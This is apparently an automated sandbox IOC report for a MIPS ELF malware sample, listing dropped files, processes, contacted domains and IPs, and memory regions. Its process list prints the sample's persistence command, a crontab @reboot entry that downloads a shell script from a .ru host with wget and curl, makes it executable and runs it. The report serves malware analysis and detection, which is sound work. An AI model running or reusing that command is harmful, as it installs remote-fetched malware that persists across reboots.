IOC Report
mpsl.elf

loading gif

Files

File Path
Type
Category
Malicious
mpsl.elf
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
malicious
/var/spool/cron/crontabs/tmp.73SHgw
ASCII text
dropped
malicious

Processes

Path
Cmdline
Malicious
/tmp/mpsl.elf
/tmp/mpsl.elf
/tmp/mpsl.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/mpsl.elf
-
/tmp/mpsl.elf
-
/tmp/mpsl.elf
-
/tmp/mpsl.elf
-
/tmp/mpsl.elf
-
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Domains

Name
IP
Malicious
kingstonwikkerink.dyn
81.29.149.178

IPs

IP
Domain
Country
Malicious
185.82.200.181
unknown
Netherlands
88.151.195.22
unknown
Azerbaijan
109.202.202.202
unknown
Switzerland
31.13.248.89
unknown
Bulgaria
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7f71fc000000
page read and write
7f720136c000
page read and write
7f7200194000
page read and write
7f717c45f000
page read and write
7f720167e000
page read and write
558c1a9d8000
page execute and read and write
7f71fc021000
page read and write
7f717c461000
page read and write
7f7200c5a000
page read and write
7f717c45f000
page read and write
7f7201676000
page read and write
7f720154d000
page read and write
7f72016c3000
page read and write
7f717c419000
page execute read
7f7201676000
page read and write
558c1b4cd000
page read and write
7f7200ffb000
page read and write
7f720103b000
page read and write
7f717c459000
page read and write
7f720101e000
page read and write
7fffe97a4000
page execute read
7fffe9717000
page read and write
7fffe97a4000
page execute read
7f72009aa000
page read and write
7f720167e000
page read and write
558c1a9d8000
page execute and read and write
558c1a9ef000
page read and write
558c189d0000
page read and write
7f720099c000
page read and write
7f71fc000000
page read and write
558c189d0000
page read and write
558c189da000
page read and write
7f717c459000
page read and write
558c18748000
page execute read
7f720101e000
page read and write
7f71fc021000
page read and write
558c1b4cd000
page read and write
7f72009aa000
page read and write
558c189da000
page read and write
558c1a9ef000
page read and write
7f720103b000
page read and write
558c1a9d8000
page execute and read and write
7f72016c3000
page read and write
7f71fc021000
page read and write
7f717c45f000
page read and write
7f7200c5a000
page read and write
7f720099c000
page read and write
558c1a9ef000
page read and write
7f7200ffb000
page read and write
7f720099c000
page read and write
7f720154d000
page read and write
7f720167e000
page read and write
7f7200c5a000
page read and write
7f7200194000
page read and write
7fffe9717000
page read and write
7fffe97a4000
page execute read
7f720103b000
page read and write
7f72009aa000
page read and write
7f720136c000
page read and write
7f717c419000
page execute read
7f72016c3000
page read and write
7fffe9717000
page read and write
558c1b4cd000
page read and write
558c18748000
page execute read
558c18748000
page execute read
7f720101e000
page read and write
7f7201676000
page read and write
7f717c459000
page read and write
558c189d0000
page read and write
7f720136c000
page read and write
7f7200194000
page read and write
7f71fc000000
page read and write
7f7200ffb000
page read and write
558c189da000
page read and write
7f717c419000
page execute read
7f720154d000
page read and write
There are 66 hidden memdumps, click here to show them.